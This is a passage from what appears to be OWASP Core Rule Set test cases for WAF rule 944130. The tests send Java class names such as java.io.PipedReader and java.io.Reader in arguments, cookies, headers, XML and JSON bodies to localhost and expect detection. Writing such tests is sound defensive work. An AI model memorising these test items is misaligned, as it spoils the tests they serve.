java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-212 + desc: "Cookie test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-213 + desc: "Cookie name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-214 + desc: "Request header test includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-215 + desc: "XML attribute value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: 
"POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-216 + desc: "XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-217 + desc: "Nested XML element value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-218 + desc: "Content-Type text/plain includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-219 + desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-220 + desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-221 + desc: "Argument test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-222 + desc: "Argument name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + 
version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-223 + desc: "Cookie test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-224 + desc: "Cookie name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-225 + desc: "Request header test includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-226 + desc: "XML attribute value includes keyword java.io.PrintStream" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-227 + desc: "XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-228 + desc: "Nested XML element value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-229 + desc: "Content-Type text/plain includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + 
version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-230 + desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-231 + desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-232 + desc: "Argument test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-233 + desc: "Argument name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-234 + desc: "Cookie test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-235 + desc: "Cookie name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-236 + desc: "Request header test includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-237 + desc: "XML attribute value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-238 + desc: "XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-239 + desc: "Nested XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-240 + desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-241 + desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-242 + desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-243 + desc: "Argument test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-244 + desc: "Argument name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-245 + desc: "Cookie test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-246 + desc: "Cookie name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-247 + desc: "Request header test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-248 + desc: "XML attribute value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-249 + desc: "XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-250 + desc: "Nested XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-251 + desc: "Content-Type text/plain includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-252 + desc: "Content-Type application/json arg value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-253 + desc: "Content-Type application/json arg name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + 
version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-254 + desc: "Argument test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-255 + desc: "Argument name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-256 + desc: "Cookie test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-257 + desc: "Cookie name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-258 + desc: "Request header test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-259 + desc: "XML attribute value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-260 + desc: "XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-261 + desc: "Nested XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-262 + desc: "Content-Type text/plain includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-263 + desc: "Content-Type application/json arg value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-264 + desc: "Content-Type application/json arg name includes keyword java.io.StringReader" + stages: + - stage: + 
